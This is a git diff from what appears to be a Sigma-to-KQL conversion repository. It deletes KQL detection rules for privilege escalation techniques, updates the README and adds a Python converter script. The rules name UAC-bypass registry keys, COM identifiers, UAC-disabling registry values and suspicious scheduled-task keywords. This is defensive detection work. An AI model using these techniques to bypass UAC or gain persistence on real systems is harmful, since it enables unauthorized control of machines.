--- a/Privilege Escalation/UAC_Bypass_WSReset.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where FolderPath endswith "\\wsreset.exe" and (ProcessIntegrityLevel in~ ("High", "System"))
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_With_Fake_DLL.kql b/Privilege Escalation/UAC_Bypass_With_Fake_DLL.kql
deleted file mode 100644
index ea6ebd96..00000000
--- a/Privilege Escalation/UAC_Bypass_With_Fake_DLL.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: oscd.community, Dmitry Uchakin
-// Date: 2020/10/06
-// Level: high
-// Description: Attempts to load dismcore.dll after dropping it
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\dismcore.dll" and InitiatingProcessFolderPath endswith "\\dism.exe") and (not(FolderPath =~ "C:\\Windows\\System32\\Dism\\dismcore.dll"))
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_via_Event_Viewer.kql b/Privilege Escalation/UAC_Bypass_via_Event_Viewer.kql
deleted file mode 100644
index c13ab477..00000000
--- a/Privilege Escalation/UAC_Bypass_via_Event_Viewer.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2017/03/19
-// Level: high
-// Description: Detects UAC bypass method using Windows event viewer
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, car.2019-04-001
-DeviceRegistryEvents
-| where RegistryKey endswith "\\mscfile\\shell\\open\\command"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_via_ICMLuaUtil.kql b/Privilege Escalation/UAC_Bypass_via_ICMLuaUtil.kql
deleted file mode 100644
index e6a2379f..00000000
--- a/Privilege Escalation/UAC_Bypass_via_ICMLuaUtil.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Elastic (idea)
-// Date: 2022/09/13
-// Level: high
-// Description: Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where ((InitiatingProcessCommandLine contains "/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" or InitiatingProcessCommandLine contains "/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}") and InitiatingProcessFolderPath endswith "\\dllhost.exe") and (not((FolderPath endswith "\\WerFault.exe" or ProcessVersionInfoOriginalFileName =~ "WerFault.exe")))
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_via_Sdclt.kql b/Privilege Escalation/UAC_Bypass_via_Sdclt.kql
deleted file mode 100644
index 62170641..00000000
--- a/Privilege Escalation/UAC_Bypass_via_Sdclt.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Omer Yampel, Christian Burkard (Nextron Systems)
-// Date: 2017/03/17
-// Level: high
-// Description: Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, car.2019-04-001
-DeviceRegistryEvents
-| where RegistryKey endswith "Software\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand" or (RegistryValueData matches regex "-1[0-9]{3}\\\\Software\\\\Classes\\\\" and RegistryKey endswith "Software\\Classes\\Folder\\shell\\open\\command\\SymbolicLinkValue")
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_via_Windows_Firewall_Snap-In_Hijack.kql b/Privilege Escalation/UAC_Bypass_via_Windows_Firewall_Snap-In_Hijack.kql
deleted file mode 100644
index dce3946b..00000000
--- a/Privilege Escalation/UAC_Bypass_via_Windows_Firewall_Snap-In_Hijack.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch, Elastic (idea)
-// Date: 2022/09/27
-// Level: medium
-// Description: Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in
-// Tags: attack.privilege_escalation, attack.t1548
-DeviceProcessEvents
-| where (InitiatingProcessCommandLine contains "WF.msc" and InitiatingProcessFolderPath endswith "\\mmc.exe") and (not(FolderPath endswith "\\WerFault.exe"))
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Disabled.kql b/Privilege Escalation/UAC_Disabled.kql
deleted file mode 100644
index 0ee19c33..00000000
--- a/Privilege Escalation/UAC_Disabled.kql	
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: frack113
-// Date: 2022/01/05
-// Level: medium
-// Description: Detects when an attacker tries to disable User Account Control (UAC) by setting the registry value "EnableLUA" to 0.
-
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Notification_Disabled.kql b/Privilege Escalation/UAC_Notification_Disabled.kql
deleted file mode 100644
index 0c9d6980..00000000
--- a/Privilege Escalation/UAC_Notification_Disabled.kql	
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024/05/10
-// Level: medium
-// Description: Detects when an attacker tries to disable User Account Control (UAC) notification by tampering with the "UACDisableNotify" value.
-UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users.
-When "UACDisableNotify" is set to 1, UAC prompts are suppressed.
-
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey contains "\\Microsoft\\Security Center\\UACDisableNotify"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Secure_Desktop_Prompt_Disabled.kql b/Privilege Escalation/UAC_Secure_Desktop_Prompt_Disabled.kql
deleted file mode 100644
index 684fe543..00000000
--- a/Privilege Escalation/UAC_Secure_Desktop_Prompt_Disabled.kql	
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2024/05/10
-// Level: medium
-// Description: Detects when an attacker tries to change User Account Control (UAC) elevation request destination via the "PromptOnSecureDesktop" value.
-The "PromptOnSecureDesktop" setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that's isolated from other processes running on the system. It's designed to prevent malicious software from intercepting or tampering with UAC prompts.
-When "PromptOnSecureDesktop" is set to 0, UAC prompts are displayed on the user's current desktop instead of the secure desktop. This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software.
-
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\PromptOnSecureDesktop"
\ No newline at end of file
diff --git a/Privilege Escalation/Uncommon_Extension_Shim_Database_Installation_Via_Sdbinst.EXE.kql b/Privilege Escalation/Uncommon_Extension_Shim_Database_Installation_Via_Sdbinst.EXE.kql
deleted file mode 100644
index 6f462ae1..00000000
--- a/Privilege Escalation/Uncommon_Extension_Shim_Database_Installation_Via_Sdbinst.EXE.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/01
-// Level: medium
-// Description: Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe.
-Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.011
-DeviceProcessEvents
-| where (FolderPath endswith "\\sdbinst.exe" or ProcessVersionInfoOriginalFileName =~ "sdbinst.exe") and (not((ProcessCommandLine =~ "" or ProcessCommandLine contains ".sdb" or isnull(ProcessCommandLine) or ((ProcessCommandLine endswith " -c" or ProcessCommandLine endswith " -f" or ProcessCommandLine endswith " -mm" or ProcessCommandLine endswith " -t") or ProcessCommandLine contains " -m -bg"))))
\ No newline at end of file
diff --git a/Privilege Escalation/Uncommon_One_Time_Only_Scheduled_Task_At_00_00.kql b/Privilege Escalation/Uncommon_One_Time_Only_Scheduled_Task_At_00_00.kql
deleted file mode 100644
index 63e818d3..00000000
--- a/Privilege Escalation/Uncommon_One_Time_Only_Scheduled_Task_At_00_00.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems)
-// Date: 2022/07/15
-// Level: high
-// Description: Detects scheduled task creation events that include suspicious actions, and is run once at 00:00
-// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.t1053.005
-DeviceProcessEvents
-| where (ProcessCommandLine contains "wscript" or ProcessCommandLine contains "vbscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "wmic " or ProcessCommandLine contains "wmic.exe" or ProcessCommandLine contains "regsvr32.exe" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "\\AppData\\") and (FolderPath contains "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and (ProcessCommandLine contains "once" and ProcessCommandLine contains "00:00")
\ No newline at end of file
diff --git a/Privilege Escalation/VsCode_Powershell_Profile_Modification.kql b/Privilege Escalation/VsCode_Powershell_Profile_Modification.kql
deleted file mode 100644
index 6d500082..00000000
--- a/Privilege Escalation/VsCode_Powershell_Profile_Modification.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/24
-// Level: medium
-// Description: Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.013
-DeviceFileEvents
-| where FolderPath endswith "\\Microsoft.VSCode_profile.ps1"
\ No newline at end of file
diff --git a/Privilege Escalation/WMI_ActiveScriptEventConsumers_Activity_Via_Scrcons.EXE_DLL_Load.kql b/Privilege Escalation/WMI_ActiveScriptEventConsumers_Activity_Via_Scrcons.EXE_DLL_Load.kql
deleted file mode 100644
index 3f40bc3a..00000000
--- a/Privilege Escalation/WMI_ActiveScriptEventConsumers_Activity_Via_Scrcons.EXE_DLL_Load.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/09/02
-// Level: medium
-// Description: Detects signs of the WMI script host process "scrcons.exe" loading scripting DLLs which could indicates WMI ActiveScriptEventConsumers EventConsumers activity.
-// Tags: attack.lateral_movement, attack.privilege_escalation, attack.persistence, attack.t1546.003
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\vbscript.dll" or FolderPath endswith "\\wbemdisp.dll" or FolderPath endswith "\\wshom.ocx" or FolderPath endswith "\\scrrun.dll") and InitiatingProcessFolderPath endswith "\\scrcons.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/WMI_Persistence_-_Script_Event_Consumer.kql b/Privilege Escalation/WMI_Persistence_-_Script_Event_Consumer.kql
deleted file mode 100644
index 36c7415d..00000000
--- a/Privilege Escalation/WMI_Persistence_-_Script_Event_Consumer.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Thomas Patzke
-// Date: 2018/03/07
-// Level: medium
-// Description: Detects WMI script event consumers
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.003
-DeviceProcessEvents
-| where FolderPath =~ "C:\\WINDOWS\\system32\\wbem\\scrcons.exe" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/Whoami.EXE_Execution_From_Privileged_Process.kql b/Privilege Escalation/Whoami.EXE_Execution_From_Privileged_Process.kql
deleted file mode 100644
index 35ff8ce9..00000000
--- a/Privilege Escalation/Whoami.EXE_Execution_From_Privileged_Process.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Teymur Kheirkhabarov
-// Date: 2022/01/28
-// Level: high
-// Description: Detects the execution of "whoami.exe" by privileged accounts that are often abused by threat actors
-// Tags: attack.privilege_escalation, attack.discovery, attack.t1033
-DeviceProcessEvents
-| where (ProcessVersionInfoOriginalFileName =~ "whoami.exe" or FolderPath endswith "\\whoami.exe") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI" or AccountName contains "TrustedInstaller")
\ No newline at end of file
diff --git a/Privilege Escalation/Windows_Kernel_Debugger_Execution.kql b/Privilege Escalation/Windows_Kernel_Debugger_Execution.kql
deleted file mode 100644
index 1742c500..00000000
--- a/Privilege Escalation/Windows_Kernel_Debugger_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/15
-// Level: medium
-// Description: Detects execution of the Windows Kernel Debugger "kd.exe".
-// Tags: attack.defense_evasion, attack.privilege_escalation
-DeviceProcessEvents
-| where FolderPath endswith "\\kd.exe" or ProcessVersionInfoOriginalFileName =~ "kd.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/Windows_Spooler_Service_Suspicious_Binary_Load.kql b/Privilege Escalation/Windows_Spooler_Service_Suspicious_Binary_Load.kql
deleted file mode 100644
index e0568272..00000000
--- a/Privilege Escalation/Windows_Spooler_Service_Suspicious_Binary_Load.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: FPT.EagleEye, Thomas Patzke (improvements)
-// Date: 2021/06/29
-// Level: informational
-// Description: Detect DLL Load from Spooler Service backup folder
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574, cve.2021.1675, cve.2021.34527
-DeviceImageLoadEvents
-| where (FolderPath contains "\\Windows\\System32\\spool\\drivers\\x64\\3\\" or FolderPath contains "\\Windows\\System32\\spool\\drivers\\x64\\4\\") and FolderPath endswith ".dll" and InitiatingProcessFolderPath endswith "\\spoolsv.exe"
\ No newline at end of file
diff --git a/README.md b/README.md
index 0cfa7def..17de79dc 100644
--- a/README.md
+++ b/README.md
@@ -1,68 +1,137 @@
-# Sigma2KQL
-Sigma Queries turned into KQL for Defender using [pysigma-backend-microsoft365defender](https://github.com/AttackIQ/pySigma-backend-microsoft365defender/tree/main)
-
-Reproducible Example:
-```python
-!git clone https://github.com/SigmaHQ/sigma.git
-!pip install pysigma-backend-microsoft365defender
-import os, glob
-path = 'sigma/rules/*/'
-file_pattern = os.path.join(path,'*.yml')
-file_list_a = glob.glob(file_pattern)
-
-import yaml
-
-def convert_to_string(yaml_dict):
-    # We change default style of strings to None (it's '>' in PyYAML)
-    # This means that PyYAML will choose style based on the data
-    yaml.SafeDumper.org_represent_str = yaml.SafeDumper.represent_str
-    def repr_str(dumper, data):
-        if '\n' in data:
-            return dumper.represent_scalar('tag:yaml.org,2002:str', data, style='|')
-        return dumper.org_represent_str(data)
-    yaml.add_representer(str, repr_str, Dumper=yaml.SafeDumper)
-
-    yaml_str = yaml.dump(yaml_dict, default_flow_style=False, Dumper=yaml.SafeDumper)
-    return yaml_str
-
-from sigma.rule import SigmaRule
-from sigma.backends.microsoft365defender import Microsoft365DefenderBackend
-from sigma.pipelines.microsoft365defender import microsoft_365_defender_pipeline
-
-
-for yml in detections_yml_paths:
-  with open(yml) as yaml_file:
-    try:
-      yaml_contents = load(yaml_file, Loader=SafeLoader)
-      # Define an example rule as a YAML str
-      sigma_rule = SigmaRule.from_yaml(convert_to_string(yaml_contents))
-      # Create backend, which automatically adds the pipeline
-      m365def_backend = Microsoft365DefenderBackend()
-
-      # Or apply the pipeline manually
-      pipeline = microsoft_365_defender_pipeline()
-      pipeline.apply(sigma_rule)
-
-      # Convert the rule
-      print(sigma_rule.title + " KQL Query: \n")
-      kql_query = m365def_backend.convert_rule(sigma_rule)[0]
-      print(kql_query)
-      print("\n \n ")
-
-      # Write the KQL query to a .kql file
-      with open('/KQL/'+sigma_rule.title.replace(' ', '_') + '.kql', 'w') as kql_file:
-        # Write metadata as comments
-        kql_file.write(f'// Author: {yaml_contents.get("author", "")}\n')
-        kql_file.write(f'// Date: {yaml_contents.get("date", "")}\n')
-        kql_file.write(f'// Level: {yaml_contents.get("level", "")}\n')
-        kql_file.write(f'// Description: {yaml_contents.get("description", "")}\n')
-        # Here it's assumed that 'tags' is a list
-        tags = yaml_contents.get("tags", [])
-        kql_file.write(f'// Tags: {", ".join(tags) if tags else ""}\n')
-        # Write the actual KQL query
-        kql_file.write(kql_query)
-        
-    except:
-      print(sigma_rule.title + " KQL Query: \n")
-      print('SigmaTransformationError: Rule category not yet supported by the Microsoft 365 Defender Sigma backend.')
+![Update Sigma Rules](https://github.com/Khadinxc/Sigma2KQL/actions/workflows/update-sigma-rules.yml/badge.svg)
+![GitHub last commit](https://img.shields.io/github/last-commit/Khadinxc/Sigma2KQL)
+# Sigma2KQL - Automated Updates
+Sigma Queries turned into KQL for Defender and Microsoft Sentinel using [pysigma-backend-KQL-backend](https://github.com/AttackIQ/pySigma-backend-kusto/tree/main)
+
+__Disclaimer: Not all of these rules have been validated either to ensure KQL is functional or if they are an exact replica of the Sigma rule. The script was created with the assumption that the pySigma Kusto backend does what it is meant to do.__
+
+```
+├───KQL
+│   ├───rules
+│   ├───rules-compliance
+│   ├───rules-emerging-threats
+│   ├───rules-placeholder
+│   └───rules-threat-hunting
+```
+
+## How do I use the helper to do this locally or in a Detection as Code pipeline?
+
+I've included a pip freeze of required libraries and as per standard practice for Python development I suggest creating a virtual environment not to _break_ system wide package management. 
+
+### Run the following commands to get started:
+
+**Clone the sigma rules repository:**
+
+```
+git clone https://github.com/SigmaHQ/sigma.git
+```
+
+```
+python -m venv .venv
+```
+
+**With Windows:**
+```
+.\.venv\Scripts\Activate.ps1
+```
+
+**With Linux**
+```
+./.venv/bin/activate
+```
+**Once in your Python virtual env:**
+
 ```
+pip install -r requirements.txt
+```
+
+**Then you can use the script like this:**
+
+```
+..\.venv\Scripts\python.exe .\helper.py --sigma-dir "C:/Users/Kaiber/sigma" --output-dir "C:/Users/Kaiber/Sigma2KQL-2025/KQL"
+```
+
+### Sample Rule Summary:
+
+```
+rules-threat-hunting Summary:
+  Successful: 96
+  Failed: 33
+  Tactics covered: 13
+
+================================================================================
+OVERALL CONVERSION COMPLETE!
+================================================================================
+Total files processed: 3637
+Total successful conversions: 2225
+Total failed conversions: 1412
+
+Output base directory: D:\Projects\SigmaTerraform\Sigma2KQL-2025\KQL
+
+Folder structure created:
+  rules/
+  rules-emerging-threats/
+  rules-threat-hunting/
+```
+
+### Sample Rule:
+
+**Sigma Rule:**
+```
+title: 7Zip Compressing Dump Files
+id: ec570e53-4c76-45a9-804d-dc3f355ff7a7
+related:
+    - id: 1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc
+      type: derived
+status: test
+description: Detects execution of 7z in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration.
+references:
+    - https://thedfirreport.com/2022/09/26/bumblebee-round-two/
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2022-09-27
+modified: 2023-09-12
+tags:
+    - attack.collection
+    - attack.t1560.001
+logsource:
+    category: process_creation
+    product: windows
+detection:
+    selection_img:
+        - Description|contains: '7-Zip'
+        - Image|endswith:
+              - '\7z.exe'
+              - '\7zr.exe'
+              - '\7za.exe'
+        - OriginalFileName:
+              - '7z.exe'
+              - '7za.exe'
+    selection_extension:
+        CommandLine|contains:
+            - '.dmp'
+            - '.dump'
+            - '.hdmp'
+    condition: all of selection_*
+falsepositives:
+    - Legitimate use of 7z with a command line in which ".dmp" or ".dump" appears accidentally
+    - Legitimate use of 7z to compress WER ".dmp" files for troubleshooting
+level: medium
+```
+
+**KQL Rule:**
+```
+// Title: 7Zip Compressing Dump Files
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-27
+// Level: medium
+// Description: Detects execution of 7z in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1560.001
+// False Positives:
+//   - Legitimate use of 7z with a command line in which ".dmp" or ".dump" appears accidentally
+//   - Legitimate use of 7z to compress WER ".dmp" files for troubleshooting
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".dmp" or ProcessCommandLine contains ".dump" or ProcessCommandLine contains ".hdmp") and (ProcessVersionInfoFileDescription contains "7-Zip" or (FolderPath endswith "\\7z.exe" or FolderPath endswith "\\7zr.exe" or FolderPath endswith "\\7za.exe") or (ProcessVersionInfoOriginalFileName in~ ("7z.exe", "7za.exe")))
+```
+
diff --git a/helper.py b/helper.py
new file mode 100644
index 00000000..0c7d3fe1
--- /dev/null
+++ b/helper.py
@@ -0,0 +1,253 @@
+"""Helper script for converting sigma rules to kql for Microsoft Sentinel and Defender XDR."""
+import os
+import glob
+import argparse
+import yaml
+from yaml import load, SafeLoader
+from sigma.rule import SigmaRule
+from sigma.backends.kusto import KustoBackend
+from sigma.pipelines.microsoftxdr import microsoft_xdr_pipeline
+
+# Parse command-line arguments
+parser = argparse.ArgumentParser(
+    description='Convert Sigma rules to KQL queries for Microsoft Sentinel and Defender XDR',
+    formatter_class=argparse.RawDescriptionHelpFormatter,
+    epilog="""
+Examples:
+  python helper.py
+  python helper.py --sigma-dir ./sigma --output-dir ./output
+  python helper.py -s ../sigma -o ../KQL-Rules
+    """
+)
+parser.add_argument(
+    '--sigma-dir', '-s',
+    type=str,
+    default='./sigma',
+    help='Path to the Sigma rules repository directory (default: ./sigma)'
+)
+parser.add_argument(
+    '--output-dir', '-o',
+    type=str,
+    default='./KQL',
+    help='Path to the output directory for KQL files (default: ./KQL)'
+)
+
+args = parser.parse_args()
+
+print("Starting Script")
+
+# Define Sigma rule folders to process
+SIGMA_BASE = os.path.abspath(args.sigma_dir)
+OUTPUT_BASE = os.path.abspath(args.output_dir)
+
+RULE_FOLDERS = [
+    "rules",
+    "rules-compliance",
+    "rules-dfir",
+    "rules-emerging-threats",
+    "rules-placeholder",
+    "rules-threat-hunting"
+]
+
+print(f"Sigma base path: {SIGMA_BASE}")
+print(f"Output base path: {OUTPUT_BASE}")
+print(f"Rule folders to process: {', '.join(RULE_FOLDERS)}")
+print("="*80)
+
+def convert_to_string(yaml_dict):
+    """Function converts yaml dict to string."""
+    # We change default style of strings to None (it's '>' in PyYAML)
+    # This means that PyYAML will choose style based on the data
+    yaml.SafeDumper.org_represent_str = yaml.SafeDumper.represent_str
+    def repr_str(dumper, data):
+        if '\n' in data:
+            return dumper.represent_scalar('tag:yaml.org,2002:str', data, style='|')
+        return dumper.org_represent_str(data)
+    yaml.add_representer(str, repr_str, Dumper=yaml.SafeDumper)
+
+    yaml_str = yaml.dump(yaml_dict, default_flow_style=False, Dumper=yaml.SafeDumper)
+    return yaml_str
+
+
+def extract_mitre_tactic(tags):
+    """Extract MITRE ATT&CK tactic from tags."""
+    # MITRE tactics mapping - using hyphens as that's what Sigma uses
+    tactics = {
+        'attack.reconnaissance': 'Reconnaissance',
+        'attack.resource-development': 'Resource Development',
+        'attack.resource_development': 'Resource Development',
+        'attack.initial-access': 'Initial Access',
+        'attack.initial_access': 'Initial Access',
+        'attack.execution': 'Execution',
+        'attack.persistence': 'Persistence',
+        'attack.privilege-escalation': 'Privilege Escalation',
+        'attack.privilege_escalation': 'Privilege Escalation',
+        'attack.defense-evasion': 'Defense Evasion',
+        'attack.defense_evasion': 'Defense Evasion',
+        'attack.credential-access': 'Credential Access',
+        'attack.credential_access': 'Credential Access',
+        'attack.discovery': 'Discovery',
+        'attack.lateral-movement': 'Lateral Movement',
+        'attack.lateral_movement': 'Lateral Movement',
+        'attack.collection': 'Collection',
+        'attack.command-and-control': 'Command and Control',
+        'attack.command_and_control': 'Command and Control',
+        'attack.exfiltration': 'Exfiltration',
+        'attack.impact': 'Impact'
+    }
+
+    if not tags:
+        return 'Uncategorized'
+
+    # Find the first matching tactic
+    for tag in tags:
+        tag_lower = tag.lower()
+        for tactic_key, tactic_name in tactics.items():
+            if tag_lower.startswith(tactic_key):
+                return tactic_name
+
+    return 'Uncategorized'
+
+
+# Overall Statistics
+TOTAL_SUCCESSFUL = 0
+TOTAL_FAILED = 0
+overall_stats = {}
+
+# Process each rule folder
+for rule_folder in RULE_FOLDERS:
+    print(f"\nProcessing: {rule_folder}")
+    print("-"*80)
+
+    # Get all YAML files from this rule folder
+    PATH = os.path.join(SIGMA_BASE, rule_folder)
+    file_pattern = os.path.join(PATH, '**', '*.yml')
+    file_list = glob.glob(file_pattern, recursive=True)
+
+    print(f"Found {len(file_list)} Sigma rule files in {rule_folder}")
+
+    if not file_list:
+        print(f"No files found in {rule_folder}, skipping...")
+        continue
+
+    # Statistics for this folder
+    SUCCESSFUL_CONVERSIONS = 0
+    FAILED_CONVERSIONS = 0
+    tactic_stats = {}
+
+    for idx, yml in enumerate(file_list, 1):
+        try:
+            with open(yml, encoding='utf-8') as yaml_file:
+                yaml_contents = load(yaml_file, Loader=SafeLoader)
+
+            # Define an example rule as a YAML str
+            sigma_rule = SigmaRule.from_yaml(convert_to_string(yaml_contents))
+
+            # Create backend with the pipeline
+            pipeline = microsoft_xdr_pipeline()
+            backend = KustoBackend(processing_pipeline=pipeline)
+
+            # Convert the rule
+            kql_query = backend.convert_rule(sigma_rule)[0]
+
+            # Get MITRE tactic from tags
+            tags = yaml_contents.get("tags", [])
+            TACTIC_FOLDER = extract_mitre_tactic(tags)
+
+            # Preserve original sigma repository folder structure for outputs
+            # Compute the path of the YAML file relative to the sigma base
+            rel_path = os.path.relpath(yml, SIGMA_BASE)
+            rel_dir = os.path.dirname(rel_path)
+            # If the file was at the top-level of SIGMA_BASE, fall back to rule_folder
+            if rel_dir:
+                OUTPUT_DIR = os.path.join(OUTPUT_BASE, rel_dir)
+            else:
+                OUTPUT_DIR = os.path.join(OUTPUT_BASE, rule_folder)
+            os.makedirs(OUTPUT_DIR, exist_ok=True)
+
+            # Sanitize filename and convert to snake_case
+            SAFE_FILENAME = "".join(c if c.isalnum() or c in (' ', '_', '-') else '_' for c in sigma_rule.title)
+            # Convert to lowercase snake_case
+            SNAKE_CASE_FILENAME = SAFE_FILENAME.replace(' ', '_').replace('-', '_').lower()
+            # Remove multiple consecutive underscores
+            while '__' in SNAKE_CASE_FILENAME:
+                SNAKE_CASE_FILENAME = SNAKE_CASE_FILENAME.replace('__', '_')
+            output_file = os.path.join(OUTPUT_DIR, SNAKE_CASE_FILENAME + '.kql')
+
+            with open(output_file, 'w', encoding='utf-8') as kql_file:
+                # Write metadata as comments
+                kql_file.write(f'// Title: {sigma_rule.title}\n')
+                kql_file.write(f'// Author: {yaml_contents.get("author", "")}\n')
+                kql_file.write(f'// Date: {yaml_contents.get("date", "")}\n')
+                kql_file.write(f'// Level: {yaml_contents.get("level", "")}\n')
+                
+                # Handle multi-line descriptions
+                description = yaml_contents.get("description", "")
+                if description:
+                    # Split by newlines and comment each line
+                    desc_lines = description.split('\n')
+                    kql_file.write(f'// Description: {desc_lines[0]}\n')
+                    for line in desc_lines[1:]:
+                        if line.strip():  # Only write non-empty lines
+                            kql_file.write(f'// {line}\n')
+                
+                kql_file.write(f'// MITRE Tactic: {TACTIC_FOLDER}\n')
+                kql_file.write(f'// Tags: {", ".join(tags) if tags else ""}\n')
+
+                # Write false positives if present
+                false_positives = yaml_contents.get("falsepositives", [])
+                if false_positives:
+                    # Filter out empty or "unknown" entries
+                    valid_fps = [str(fp).strip() for fp in false_positives 
+                                if fp and str(fp).strip() and str(fp).strip().lower() != 'unknown']
+                    if valid_fps:
+                        kql_file.write('// False Positives:\n')
+                        for fp_str in valid_fps:
+                            kql_file.write(f'//   - {fp_str}\n')
+
+                kql_file.write('\n')
+                # Write the actual KQL query
+                kql_file.write(kql_query)
+
+            SUCCESSFUL_CONVERSIONS += 1
+            # Track by tactic
+            tactic_stats[TACTIC_FOLDER] = tactic_stats.get(TACTIC_FOLDER, 0) + 1
+
+            if SUCCESSFUL_CONVERSIONS % 10 == 0:
+                print(f"[{idx}/{len(file_list)}] {rule_folder}: Converted: {SUCCESSFUL_CONVERSIONS}")
+                print(f"Failed: {FAILED_CONVERSIONS}")
+
+        except Exception as e:
+            FAILED_CONVERSIONS += 1
+            rule_name = yaml_contents.get('title', os.path.basename(yml)) if 'yaml_contents' in locals() else os.path.basename(yml)
+            if FAILED_CONVERSIONS <= 5:  # Only show first 5 errors in detail
+                print(f"[{idx}/{len(file_list)}] {rule_name} - Error: {str(e)[:100]}")
+            # Continue to next file    # Print statistics for this folder
+    print(f"\n{rule_folder} Summary:")
+    print(f"  Successful: {SUCCESSFUL_CONVERSIONS}")
+    print(f"  Failed: {FAILED_CONVERSIONS}")
+    if tactic_stats:
+        print(f"  Tactics covered: {len(tactic_stats)}")
+
+    # Update overall statistics
+    TOTAL_SUCCESSFUL += SUCCESSFUL_CONVERSIONS
+    TOTAL_FAILED += FAILED_CONVERSIONS
+
+    # Merge tactic stats
+    for tactic, count in tactic_stats.items():
+        folder_key = f"{rule_folder}/{tactic}"
+        overall_stats[folder_key] = count
+
+# Print final statistics
+print("\n" + "="*80)
+print("OVERALL CONVERSION COMPLETE!")
+print("="*80)
+print(f"Total files processed: {TOTAL_SUCCESSFUL + TOTAL_FAILED}")
+print(f"Total successful conversions: {TOTAL_SUCCESSFUL}")
+print(f"Total failed conversions: {TOTAL_FAILED}")
